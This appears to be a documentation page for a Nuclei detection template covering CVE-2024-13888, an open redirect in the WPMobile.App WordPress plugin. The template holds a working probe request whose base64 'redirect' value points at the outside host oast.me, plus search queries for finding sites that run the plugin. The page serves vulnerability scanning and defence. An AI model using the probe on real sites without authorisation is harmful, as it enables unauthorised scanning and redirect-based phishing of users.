WPMobile.App <= 11.56 - Open Redirect
ID: CVE-2024-13888
Severity: high
Author: s4e-io
Tags: cve,cve2024,redirect,wp,wordpress,wp-plugin,wpappninja
Description
Section titled “Description”The WPMobile.App plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 11.56. This is due to insufficient validation on the redirect URL supplied via the ‘redirect’ parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
YAML Source
Section titled “YAML Source”id: CVE-2024-13888
info: name: WPMobile.App <= 11.56 - Open Redirect author: s4e-io severity: high description: | The WPMobile.App plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 11.56. This is due to insufficient validation on the redirect URL supplied via the 'redirect' parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpappninja/wpmobileapp-1156-open-redirect-via-redirect-parameter - https://nvd.nist.gov/vuln/detail/CVE-2024-13888 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2024-13888 cwe-id: CWE-601 metadata: verified: true max-request: 2 vendor: amauri product: wpappninja framework: wordpress fofa-query: body="/wp-content/plugins/wpappninja" publicwww-query: "/wp-content/plugins/wpappninja" tags: cve,cve2024,redirect,wp,wordpress,wp-plugin,wpappninja
flow: http(1) && http(2)
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'contains(body, "wpappninja")' internal: true
- raw: - | GET /?redirect=aHR0cDovL29hc3QubWU=&WPMOBILE_LOCALE=en HTTP/1.1 Host: {{Hostname}}
matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$'# digest: 4a0a00473045022100e8baa5b394738f7df95db9c8328f9f88dc121af146fb9ac28155fba79df26351022063ad63220565f41592bf71b74f77fff5e992d5f377f5b912368fe5a1498ab075:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-13888.yaml"